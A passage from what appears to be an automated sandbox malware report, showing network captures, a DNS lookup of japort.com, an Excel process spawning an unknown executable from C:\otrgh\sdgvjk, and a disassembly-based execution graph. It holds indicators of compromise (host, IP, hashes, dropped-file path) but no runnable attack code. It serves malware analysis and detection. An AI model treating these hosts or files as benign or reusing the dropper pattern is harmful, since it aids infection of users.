                                                                                                    Jan 25, 2021 10:23:35.256282091 CET4434972650.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:35.256287098 CET49726443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:35.256325960 CET49726443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:35.256330013 CET4434972650.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:35.256371975 CET4434972650.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:35.256386995 CET49726443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:35.256409883 CET4434972650.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:35.256414890 CET49726443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:35.256448030 CET4434972650.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:35.256463051 CET49726443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:35.256486893 CET4434972650.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:35.256493092 CET49726443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:35.256522894 CET4434972650.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:35.256531000 CET49726443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:35.256561041 CET4434972650.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:35.256592035 CET49726443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:35.256598949 CET4434972650.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:35.256607056 CET49726443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:35.256638050 CET49726443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:35.256648064 CET4434972650.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:35.256691933 CET4434972650.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:35.256704092 CET49726443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:35.256728888 CET4434972650.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:35.256742954 CET49726443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:35.256767988 CET4434972650.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:35.256781101 CET49726443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:35.256808996 CET4434972650.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:35.256835938 CET49726443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:35.256841898 CET4434972650.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:35.256855965 CET49726443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:35.256892920 CET49726443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:35.257318974 CET4434972650.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:35.257373095 CET49726443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:35.306530952 CET49726443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:35.464435101 CET4434972650.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:50.121462107 CET49732443192.168.2.3192.168.0.1
                                                                                                    Jan 25, 2021 10:23:53.209090948 CET49732443192.168.2.3192.168.0.1
                                                                                                    Jan 25, 2021 10:23:59.319216013 CET49732443192.168.2.3192.168.0.1
                                                                                                    Jan 25, 2021 10:24:11.389790058 CET49747443192.168.2.33.19.60.159
                                                                                                    Jan 25, 2021 10:24:14.398281097 CET49747443192.168.2.33.19.60.159
                                                                                                    Jan 25, 2021 10:24:20.398782969 CET49747443192.168.2.33.19.60.159
                                                                                                    Jan 25, 2021 10:24:32.561499119 CET49755443192.168.2.33.14.70.198
                                                                                                    Jan 25, 2021 10:24:35.571873903 CET49755443192.168.2.33.14.70.198
                                                                                                    Jan 25, 2021 10:24:41.588016033 CET49755443192.168.2.33.14.70.198
                                                                                                    Jan 25, 2021 10:24:53.812453985 CET49757443192.168.2.3192.168.0.1
                                                                                                    Jan 25, 2021 10:24:56.823688984 CET49757443192.168.2.3192.168.0.1
                                                                                                    Jan 25, 2021 10:25:02.839782953 CET49757443192.168.2.3192.168.0.1
                                                                                                    Jan 25, 2021 10:25:14.933722019 CET49759443192.168.2.33.19.60.159
                                                                                                    Jan 25, 2021 10:25:17.934817076 CET49759443192.168.2.33.19.60.159
                                                                                                    Jan 25, 2021 10:25:23.935389996 CET49759443192.168.2.33.19.60.159
                                                                                                    Jan 25, 2021 10:25:37.011631012 CET49760443192.168.2.33.14.70.198
                                                                                                    Jan 25, 2021 10:25:40.014753103 CET49760443192.168.2.33.14.70.198

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 25, 2021 10:23:17.652827024 CET6010053192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:17.678745031 CET53601008.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:18.710175037 CET5319553192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:18.733675003 CET53531958.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:19.509645939 CET5014153192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:19.535758972 CET53501418.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:21.218935013 CET5302353192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:21.242017984 CET53530238.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:25.692101002 CET4956353192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:25.723529100 CET53495638.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:27.922821045 CET5135253192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:27.946186066 CET53513528.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:28.776576996 CET5934953192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:28.799781084 CET53593498.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:29.154397964 CET5708453192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:29.198488951 CET53570848.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:29.557542086 CET5882353192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:29.602792025 CET53588238.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:30.569367886 CET5882353192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:30.601056099 CET53588238.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:31.566653013 CET5882353192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:31.598356009 CET53588238.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:31.941112995 CET5756853192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:32.064635038 CET5054053192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:32.068098068 CET53575688.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:32.090655088 CET53505408.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:32.839071035 CET5436653192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:32.871134043 CET53543668.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.582461119 CET5882353192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:33.615036964 CET53588238.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.621869087 CET5303453192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:33.644891977 CET53530348.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:34.401454926 CET5776253192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:34.424726963 CET53577628.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:37.598787069 CET5882353192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:37.632719994 CET53588238.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:48.440037012 CET5543553192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:48.474277973 CET53554358.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:49.945501089 CET5071353192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:49.971278906 CET53507138.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:23:53.134165049 CET5613253192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:23:53.169868946 CET53561328.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:24:04.506521940 CET5898753192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:24:04.538395882 CET53589878.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:24:05.715949059 CET5657953192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:24:05.739253044 CET53565798.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:24:07.536834002 CET6063353192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:24:07.559916019 CET53606338.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:24:07.915107965 CET6129253192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:24:07.938407898 CET53612928.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:24:10.855686903 CET6361953192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:24:10.887474060 CET53636198.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:24:14.139369011 CET6493853192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:24:14.162503958 CET53649388.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:24:23.875736952 CET6194653192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:24:23.901622057 CET53619468.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:24:25.316063881 CET6491053192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:24:25.350987911 CET53649108.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:24:52.973000050 CET5212353192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:24:52.999141932 CET53521238.8.8.8192.168.2.3
                                                                                                    Jan 25, 2021 10:25:11.114424944 CET5613053192.168.2.38.8.8.8
                                                                                                    Jan 25, 2021 10:25:11.162878990 CET53561308.8.8.8192.168.2.3

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                    Jan 25, 2021 10:23:31.941112995 CET192.168.2.38.8.8.80x900bStandard query (0)japort.comA (IP address)IN (0x0001)

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                    Jan 25, 2021 10:23:32.068098068 CET8.8.8.8192.168.2.30x900bNo error (0)japort.com50.87.232.245A (IP address)IN (0x0001)
                                                                                                    Jan 25, 2021 10:24:07.559916019 CET8.8.8.8192.168.2.30x9a90No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)

                                                                                                    HTTPS Packets

                                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                    Jan 25, 2021 10:23:32.390734911 CET50.87.232.245443192.168.2.349722CN=cpanel.japort.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon Dec 14 09:07:11 CET 2020 Wed Oct 07 21:21:40 CEST 2020Sun Mar 14 09:07:11 CET 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                    CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                    Code Manipulations

                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    High Level Behavior Distribution

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Start time:10:23:27
                                                                                                    Start date:25/01/2021
                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                    Imagebase:0x8e0000
                                                                                                    File size:27110184 bytes
                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:10:23:35
                                                                                                    Start date:25/01/2021
                                                                                                    Path:C:\otrgh\sdgvjk\fdcbn.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:'C:\otrgh\sdgvjk\fdcbn.exe'
                                                                                                    Imagebase:0x7ff7645b0000
                                                                                                    File size:742003 bytes
                                                                                                    MD5 hash:DC74FAE0ADA0A2426E77588E3797E040
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low

                                                                                                    General

                                                                                                    Start time:10:23:41
                                                                                                    Start date:25/01/2021
                                                                                                    Path:C:\otrgh\sdgvjk\fdcbn.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:'C:\otrgh\sdgvjk\fdcbn.exe'
                                                                                                    Imagebase:0x7ff7645b0000
                                                                                                    File size:742003 bytes
                                                                                                    MD5 hash:DC74FAE0ADA0A2426E77588E3797E040
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low

                                                                                                    Disassembly

                                                                                                    Code Analysis

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:1.8%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:40.8%
                                                                                                      Total number of Nodes:250
                                                                                                      Total number of Limit Nodes:10

                                                                                                      Graph

                                                                                                      execution_graph 5063 7ff7645bdfc2 5064 7ff7645c92a0 9 API calls 5063->5064 5065 7ff7645bdfdb 5064->5065 5066 7ff7645c92a0 9 API calls 5065->5066 5067 7ff7645be024 5066->5067 5068 7ff7645c92a0 9 API calls 5067->5068 5069 7ff7645be054 5068->5069 5070 7ff7645bef7c 5069->5070 5071 7ff7645c92a0 9 API calls 5069->5071 5071->5069 4847 7ff7645b81c0 4849 7ff7645b8230 4847->4849 4848 7ff7645b8245 4849->4848 4850 7ff764602d44 34 API calls 4849->4850 4850->4849 4963 7ff7645bb780 4970 7ff7645c92a0 4963->4970 4965 7ff7645bb7c9 4966 7ff7645c92a0 9 API calls 4965->4966 4967 7ff7645bb912 4966->4967 4976 7ff764602d20 4967->4976 4971 7ff7645c92e4 4970->4971 4973 7ff7645c9360 4971->4973 4985 7ff7645c2af0 4971->4985 4974 7ff764602d20 _invalid_parameter_noinfo 8 API calls 4973->4974 4975 7ff7645c9454 4974->4975 4975->4965 4977 7ff764602d2a 4976->4977 4978 7ff7645bb96c 4977->4978 4979 7ff76460304c IsProcessorFeaturePresent 4977->4979 4980 7ff764603063 4979->4980 5009 7ff764603190 RtlCaptureContext 4980->5009 4993 7ff7645c2b87 4985->4993 4988 7ff7645c2ebc 4991 7ff764602d20 _invalid_parameter_noinfo 8 API calls 4988->4991 4989 7ff7645c33d5 LoadLibraryA 4989->4993 4990 7ff7645c1780 8 API calls 4990->4993 4994 7ff7645c3438 4991->4994 4992 7ff7645c92a0 8 API calls 4992->4993 4993->4988 4993->4989 4993->4990 4993->4992 4995 7ff7645c3710 4993->4995 4999 7ff7645c1c00 4993->4999 4994->4971 4996 7ff7645c3783 4995->4996 4998 7ff7645c3aa6 4996->4998 5003 7ff7645c2330 4996->5003 4998->4993 5000 7ff7645c1c6f 4999->5000 5001 7ff764602d20 _invalid_parameter_noinfo 8 API calls 5000->5001 5002 7ff7645c20ff 5001->5002 5002->4993 5005 7ff7645c238b 5003->5005 5004 7ff7645c24d0 5007 7ff764602d20 _invalid_parameter_noinfo 8 API calls 5004->5007 5005->5004 5006 7ff7645c2af0 9 API calls 5005->5006 5006->5005 5008 7ff7645c28d5 5007->5008 5008->4996 5010 7ff7646031aa RtlLookupFunctionEntry 5009->5010 5011 7ff7646031c0 RtlVirtualUnwind 5010->5011 5012 7ff764603076 5010->5012 5011->5010 5011->5012 5013 7ff764603204 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5012->5013 5052 7ff7645b1000 5053 7ff7645c92a0 9 API calls 5052->5053 5054 7ff7645b105b 5053->5054 5055 7ff7645b11c4 5054->5055 5057 7ff7645c92a0 9 API calls 5054->5057 5056 7ff764602d20 _invalid_parameter_noinfo 8 API calls 5055->5056 5058 7ff7645b11d1 5056->5058 5057->5054 5072 7ff7645b57c0 5073 7ff7645b57f2 5072->5073 5076 7ff7645b2f10 5073->5076 5079 7ff7645b2f5d 5076->5079 5077 7ff7645c92a0 9 API calls 5077->5079 5078 7ff7645b2fbb 5080 7ff764602d20 _invalid_parameter_noinfo 8 API calls 5078->5080 5079->5077 5079->5078 5081 7ff7645b3286 5080->5081 5157 7ff7645b86ff 5158 7ff7645b8720 5157->5158 5159 7ff7645b8800 8 API calls 5158->5159 5160 7ff7645b8735 5158->5160 5159->5158 5165 7ff7646038b8 5168 7ff7646038cc 5165->5168 5169 7ff7646038c1 5168->5169 5170 7ff7646038ef GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5168->5170 5170->5169 5014 7ff7645b3d8f 5017 7ff7645b9040 5014->5017 5018 7ff7645b9090 5017->5018 5019 7ff7645b92f7 GetProcessHeap HeapFree 5018->5019 5020 7ff7645b3db3 5018->5020 5019->5018 5039 7ff7645b7350 5045 7ff7645b73b2 5039->5045 5040 7ff7645b9040 GetProcessHeap HeapFree 5040->5045 5041 7ff7645b77be 5042 7ff764602d20 _invalid_parameter_noinfo 8 API calls 5041->5042 5043 7ff7645b7c70 5042->5043 5045->5040 5045->5041 5046 7ff7645c92a0 9 API calls 5045->5046 5047 7ff7645b7c90 GetProcessHeap HeapAlloc 5045->5047 5046->5045 5048 7ff7645b7cd6 5047->5048 5048->5045 5093 7ff7645b468d 5099 7ff7645b46a0 5093->5099 5094 7ff7645b50f5 5096 7ff7645b9040 2 API calls 5094->5096 5095 7ff7645b9040 GetProcessHeap HeapFree 5095->5099 5097 7ff7645b5273 5096->5097 5098 7ff7645b9340 8 API calls 5098->5099 5099->5094 5099->5095 5099->5098 5100 7ff76460d885 5101 7ff76460d88c _clrfp 5100->5101 5102 7ff76460d97c RaiseException 5101->5102 5103 7ff76460d999 5102->5103 5113 7ff7645b124b 5115 7ff7645b1260 5113->5115 5114 7ff7645b179f 5115->5114 5116 7ff7645c92a0 9 API calls 5115->5116 5116->5115 5104 7ff7645b3e62 5105 7ff7645b3e87 5104->5105 5106 7ff7645c92a0 9 API calls 5105->5106 5107 7ff7645b3e9c 5106->5107 5108 7ff7645c92a0 9 API calls 5107->5108 5109 7ff7645b3ec5 5108->5109 5117 7ff7645b401f 5118 7ff7645c92a0 9 API calls 5117->5118 5119 7ff7645b4034 5118->5119 5171 7ff7645b84a0 5172 7ff7645b84f0 5171->5172 5173 7ff7645b859b 5172->5173 5174 7ff7645b9040 GetProcessHeap HeapFree 5172->5174 5174->5172 5110 7ff7645b5260 5111 7ff7645b9040 2 API calls 5110->5111 5112 7ff7645b5273 5110->5112 5111->5112 5112->5112 5175 7ff7645b32a0 5178 7ff7645b3334 5175->5178 5176 7ff7645c92a0 9 API calls 5176->5178 5177 7ff7645b340b 5179 7ff764602d20 _invalid_parameter_noinfo 8 API calls 5177->5179 5178->5176 5178->5177 5180 7ff7645b3931 5179->5180 5025 7ff7645e3560 5028 7ff7645e35c0 5025->5028 5026 7ff7645e35d9 5027 7ff7645c92a0 9 API calls 5027->5028 5028->5026 5028->5027 5049 7ff7645b7317 5050 7ff764602d20 _invalid_parameter_noinfo 8 API calls 5049->5050 5051 7ff7645b7331 5050->5051 5120 7ff7645d0c35 5121 7ff7645d0b90 5120->5121 5121->5120 5138 7ff7645b5e40 5121->5138 5123 7ff7645d1813 5148 7ff7645d30d0 5123->5148 5126 7ff7645b9040 2 API calls 5127 7ff7645d1d12 5126->5127 5128 7ff7645b9040 2 API calls 5127->5128 5129 7ff7645d1d23 5128->5129 5130 7ff7645b9040 2 API calls 5129->5130 5131 7ff7645d1d34 5130->5131 5132 7ff7645b9040 2 API calls 5131->5132 5133 7ff7645d1d45 5132->5133 5134 7ff7645b9040 2 API calls 5133->5134 5135 7ff7645d1d56 5134->5135 5136 7ff7645b9040 2 API calls 5135->5136 5137 7ff7645d1d67 5136->5137 5139 7ff7645b5e70 5138->5139 5140 7ff7645b9040 2 API calls 5139->5140 5141 7ff7645b5ea3 5140->5141 5143 7ff7645b9040 GetProcessHeap HeapFree 5141->5143 5144 7ff7645b5f4f 5141->5144 5147 7ff7645b8800 8 API calls 5141->5147 5153 7ff7645b9340 5141->5153 5143->5141 5145 7ff764602d20 _invalid_parameter_noinfo 8 API calls 5144->5145 5146 7ff7645b63f6 5145->5146 5146->5123 5147->5141 5152 7ff7645d3120 5148->5152 5149 7ff7645d1d01 5149->5126 5150 7ff7645b9040 GetProcessHeap HeapFree 5150->5152 5151 7ff7645b8800 8 API calls 5151->5152 5152->5149 5152->5150 5152->5151 5156 7ff7645b9390 5153->5156 5154 7ff7645b944c 5154->5141 5155 7ff7645b8800 8 API calls 5155->5156 5156->5154 5156->5155 5181 7ff7645b52b0 5182 7ff7645b52b7 5181->5182 5182->5181 5183 7ff7645b5e40 18 API calls 5182->5183 5184 7ff7645b5707 5183->5184 5185 7ff7645b9040 2 API calls 5184->5185 5186 7ff7645b570f 5185->5186 5032 7ff7645e4f70 5038 7ff7645e4fff 5032->5038 5033 7ff7645e7088 5034 7ff764602d20 _invalid_parameter_noinfo 8 API calls 5033->5034 5037 7ff7645e70ab 5034->5037 5035 7ff7645e524e 5036 7ff7645c92a0 9 API calls 5036->5038 5038->5033 5038->5035 5038->5036 4851 7ff76460656c GetLastError 4852 7ff76460658e 4851->4852 4853 7ff764606593 4851->4853 4886 7ff764605e5c 4852->4886 4857 7ff76460659b SetLastError 4853->4857 4874 7ff764605ea4 4853->4874 4861 7ff7646065e7 4863 7ff764605ea4 _invalid_parameter_noinfo 6 API calls 4861->4863 4862 7ff7646065d7 4864 7ff764605ea4 _invalid_parameter_noinfo 6 API calls 4862->4864 4865 7ff7646065ef 4863->4865 4871 7ff7646065de 4864->4871 4866 7ff764606605 4865->4866 4867 7ff7646065f3 4865->4867 4896 7ff7646066c0 4866->4896 4868 7ff764605ea4 _invalid_parameter_noinfo 6 API calls 4867->4868 4868->4871 4890 7ff7646076b4 4871->4890 4901 7ff7646060d8 4874->4901 4876 7ff764605ed2 4877 7ff764605ee4 TlsSetValue 4876->4877 4878 7ff764605edc 4876->4878 4877->4878 4878->4857 4879 7ff764607e74 4878->4879 4884 7ff764607e85 _invalid_parameter_noinfo 4879->4884 4880 7ff764607ed6 4913 7ff764607d9c 4880->4913 4881 7ff764607eba RtlAllocateHeap 4882 7ff7646065c9 4881->4882 4881->4884 4882->4861 4882->4862 4884->4880 4884->4881 4910 7ff764607a2c 4884->4910 4887 7ff7646060d8 try_get_function 5 API calls 4886->4887 4888 7ff764605e83 TlsGetValue 4887->4888 4891 7ff7646076b9 HeapFree 4890->4891 4893 7ff7646076e9 __free_lconv_mon 4890->4893 4892 7ff7646076d4 4891->4892 4891->4893 4894 7ff764607d9c __free_lconv_mon 12 API calls 4892->4894 4893->4857 4895 7ff7646076d9 GetLastError 4894->4895 4895->4893 4945 7ff764606888 4896->4945 4902 7ff764606139 4901->4902 4908 7ff764606134 try_get_function 4901->4908 4902->4876 4903 7ff76460621c 4903->4902 4905 7ff76460622a GetProcAddress 4903->4905 4904 7ff764606168 LoadLibraryExW 4906 7ff764606189 GetLastError 4904->4906 4904->4908 4905->4902 4906->4908 4907 7ff764606201 FreeLibrary 4907->4908 4908->4902 4908->4903 4908->4904 4908->4907 4909 7ff7646061c3 LoadLibraryExW 4908->4909 4909->4908 4916 7ff764607a64 4910->4916 4922 7ff76460656c GetLastError 4913->4922 4915 7ff764607da5 4915->4882 4921 7ff764606330 EnterCriticalSection 4916->4921 4923 7ff76460658e 4922->4923 4924 7ff764606593 4922->4924 4925 7ff764605e5c _invalid_parameter_noinfo 6 API calls 4923->4925 4926 7ff764605ea4 _invalid_parameter_noinfo 6 API calls 4924->4926 4928 7ff76460659b SetLastError 4924->4928 4925->4924 4927 7ff7646065b6 4926->4927 4927->4928 4930 7ff764607e74 _invalid_parameter_noinfo 12 API calls 4927->4930 4928->4915 4931 7ff7646065c9 4930->4931 4932 7ff7646065e7 4931->4932 4933 7ff7646065d7 4931->4933 4934 7ff764605ea4 _invalid_parameter_noinfo 6 API calls 4932->4934 4935 7ff764605ea4 _invalid_parameter_noinfo 6 API calls 4933->4935 4936 7ff7646065ef 4934->4936 4942 7ff7646065de 4935->4942 4937 7ff764606605 4936->4937 4938 7ff7646065f3 4936->4938 4940 7ff7646066c0 _invalid_parameter_noinfo 12 API calls 4937->4940 4939 7ff764605ea4 _invalid_parameter_noinfo 6 API calls 4938->4939 4939->4942 4943 7ff76460660d 4940->4943 4941 7ff7646076b4 __free_lconv_mon 12 API calls 4941->4928 4942->4941 4944 7ff7646076b4 __free_lconv_mon 12 API calls 4943->4944 4944->4928 4957 7ff764606330 EnterCriticalSection 4945->4957

                                                                                                      Executed Functions

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 7ff7645c2af0-7ff7645c2b85 1 7ff7645c2b90-7ff7645c2b96 0->1 2 7ff7645c2c00-7ff7645c2c06 1->2 3 7ff7645c2b98-7ff7645c2b9e 1->3 6 7ff7645c2cb0-7ff7645c2cb6 2->6 7 7ff7645c2c0c-7ff7645c2c12 2->7 4 7ff7645c2c60-7ff7645c2c66 3->4 5 7ff7645c2ba4-7ff7645c2baa 3->5 8 7ff7645c2e0d-7ff7645c2e13 4->8 9 7ff7645c2c6c-7ff7645c2c72 4->9 10 7ff7645c2bb0-7ff7645c2bb6 5->10 11 7ff7645c2d07-7ff7645c2d0d 5->11 12 7ff7645c2e6c-7ff7645c2e72 6->12 13 7ff7645c2cbc-7ff7645c2cc2 6->13 14 7ff7645c2d82-7ff7645c2d88 7->14 15 7ff7645c2c18-7ff7645c2c1e 7->15 24 7ff7645c3289-7ff7645c329d 8->24 25 7ff7645c2e19-7ff7645c2e1f 8->25 20 7ff7645c2c78-7ff7645c2c7e 9->20 21 7ff7645c2b87-7ff7645c2b8c 9->21 22 7ff7645c2ea4-7ff7645c2eaa 10->22 23 7ff7645c2bbc-7ff7645c2bc2 10->23 28 7ff7645c2d13-7ff7645c2d19 11->28 29 7ff7645c320e-7ff7645c3225 11->29 16 7ff7645c32b3-7ff7645c32dc call 7ff7645c1c00 call 7ff7645c1330 12->16 17 7ff7645c2e78-7ff7645c2e7e 12->17 26 7ff7645c30b9-7ff7645c30ee 13->26 27 7ff7645c2cc8-7ff7645c2cce 13->27 18 7ff7645c3259-7ff7645c326d 14->18 19 7ff7645c2d8e-7ff7645c2d94 14->19 30 7ff7645c2fa6-7ff7645c2fcb call 7ff7645c3710 15->30 31 7ff7645c2c24-7ff7645c2c2a 15->31 16->1 35 7ff7645c32e1-7ff7645c32ea 17->35 36 7ff7645c2e84-7ff7645c2e8a 17->36 18->1 45 7ff7645c3272-7ff7645c3284 19->45 46 7ff7645c2d9a-7ff7645c2da0 19->46 37 7ff7645c3085-7ff7645c30b4 20->37 38 7ff7645c2c84-7ff7645c2c8a 20->38 21->1 39 7ff7645c2eb0-7ff7645c2eb6 22->39 40 7ff7645c32ef-7ff7645c3305 22->40 48 7ff7645c2ec1-7ff7645c2f2e 23->48 49 7ff7645c2bc8-7ff7645c2bce 23->49 24->1 51 7ff7645c32a2-7ff7645c32ae 25->51 52 7ff7645c2e25-7ff7645c2e2b 25->52 34 7ff7645c30f0-7ff7645c30f5 26->34 41 7ff7645c2cd4-7ff7645c2cda 27->41 42 7ff7645c31ce-7ff7645c31f9 27->42 43 7ff7645c2d1f-7ff7645c2d25 28->43 44 7ff7645c322a-7ff7645c3254 28->44 29->1 79 7ff7645c2fcd-7ff7645c2fdc 30->79 32 7ff7645c2c30-7ff7645c2c36 31->32 33 7ff7645c3076-7ff7645c3080 31->33 32->1 54 7ff7645c2c3c-7ff7645c2c50 32->54 33->1 55 7ff7645c3170-7ff7645c3175 34->55 56 7ff7645c30f7-7ff7645c30fc 34->56 35->1 36->1 57 7ff7645c2e90-7ff7645c2e9f 36->57 53 7ff7645c31fe-7ff7645c3209 37->53 38->1 58 7ff7645c2c90-7ff7645c2ca0 38->58 39->1 59 7ff7645c2ebc-7ff7645c3450 call 7ff764602d20 39->59 68 7ff7645c3307-7ff7645c330c 40->68 41->1 61 7ff7645c2ce0-7ff7645c2d02 41->61 42->53 43->1 62 